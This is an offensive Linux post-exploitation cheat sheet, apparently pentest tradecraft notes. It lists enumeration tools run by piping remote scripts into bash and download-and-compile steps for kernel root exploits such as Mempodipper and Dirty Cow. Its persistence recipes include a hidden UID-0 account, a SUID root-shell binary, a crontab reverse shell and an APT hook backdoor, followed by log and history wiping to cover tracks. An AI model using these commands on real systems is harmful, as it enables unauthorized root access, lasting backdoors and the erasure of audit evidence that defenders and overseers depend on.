Linux Exploit#

Tradecraft for the operator on a Linux foothold. Enumeration runs through LinEnum, BeRoot, and linux-smart-enumeration; common kernel exploits handle privilege escalation; persistence chains and cover-track recipes round out the kit.

LinEnum#

Scripted local Linux enumeration and privilege-escalation checks. Place the script on the target host.

Categories: kernel and distribution, system info, user info, privileged access, environmental, jobs / tasks, services, version info, default / weak credentials, useful file searches, platform / software tests.

Full host enumeration with report output into /tmp.

$ linenum.sh -s -r report.txt -e /tmp/ -t

Direct execution one-liners.

$ bash <(wget -q -O - https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) \
    -r report.txt -e /tmp/ -t -i

$ bash <(curl -s https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh) \
    -r report.txt -e /tmp/ -t -i

BeRoot#

Post-exploitation tool to check common misconfigurations on Linux and macOS to find a path to escalate. linux-exploit-suggester is embedded. Place the script on the target.

Categories: GTFOBins, wildcards, sensitive files, services, SUID binaries, PATH environment variable, NFS root squashing, LD_PRELOAD, sudoers file, sudo list, Python library hijacking, capabilities, ptrace scope, exploit suggest.

Basic enumeration.

$ python beroot.py

# If you have a user password
$ python beroot.py --password <PASS>

Linux smart enumeration#

Linux enumeration tool for pentesting and CTFs with verbosity levels. Place the script on the target.

Categories: user, sudo, file system, system, security measures, recurrent tasks (cron, timers), network, services, processes, software, container (docker, lxc).

$ lse.sh                             # basic
$ lse.sh -l1                         # verbose
$ lse.sh -l2                         # dump everything

One-liner download and chmod.

$ wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh; chmod 700 lse.sh
$ curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh; chmod 700 lse.sh

Direct execution one-liner.

$ bash <(wget -q -O - https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l2 -i
$ bash <(curl -s https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l1 -i

Common exploits#

  • CVE-2010-3904, Linux RDS, kernel <= 2.6.36-rc8 (https://www.exploit-db.com/exploits/15285).

  • CVE-2010-4258, kernel <= 2.6.37 “Full-Nelson.c” (https://www.exploit-db.com/exploits/15704).

  • CVE-2012-0056, Mempodipper, kernel 2.6.39 to 3.2.2 (Gentoo / Ubuntu x86/x64).

    $ wget -O exploit.c http://www.exploit-db.com/download/18411
    $ gcc -o mempodipper exploit.c
    $ ./mempodipper
    
  • CVE-2016-5195, Dirty Cow, kernel <= 3.19.0-73.8 (https://dirtycow.ninja/).

    # compile dirty cow
    $ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
    
  • CVE-2010-3904, RDS protocol, kernel 2.6.32.

Cross-compiling with GCC.

# 32 bit
$ gcc -m32 -o hello_32 hello.c
# 64 bit
$ gcc -m64 -o hello_64 hello.c

Persistence#

Create a root user.

$ sudo useradd -ou 0 -g 0 john
$ sudo passwd john
$ echo "linuxpassword" | passwd --stdin john

SUID binary.

TMPDIR2="/var/tmp"
echo 'int main(void){setresuid(0, 0, 0);system("/bin/sh");}' > $TMPDIR2/croissant.c
gcc $TMPDIR2/croissant.c -o $TMPDIR2/croissant 2>/dev/null
rm $TMPDIR2/croissant.c
chown root:root $TMPDIR2/croissant
chmod 4777 $TMPDIR2/croissant

Crontab reverse shell.

$ (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash") | crontab 2> /dev/null

Backdoor APT.

# apt.conf.d directory
APT::Update::Pre-Invoke {"CMD"};
# When target runs "apt-get update" your CMD will be executed.

# example
$ echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor

Cover tracks#

# Reset logfile to 0 without restarting syslogd
$ cat /dev/null > /var/log/auth.log

# Clear terminal history
$ cat /dev/null > ~/.bash_history
$ history -c
$ export HISTFILESIZE=0
$ export HISTSIZE=0
$ unset HISTFILE

References#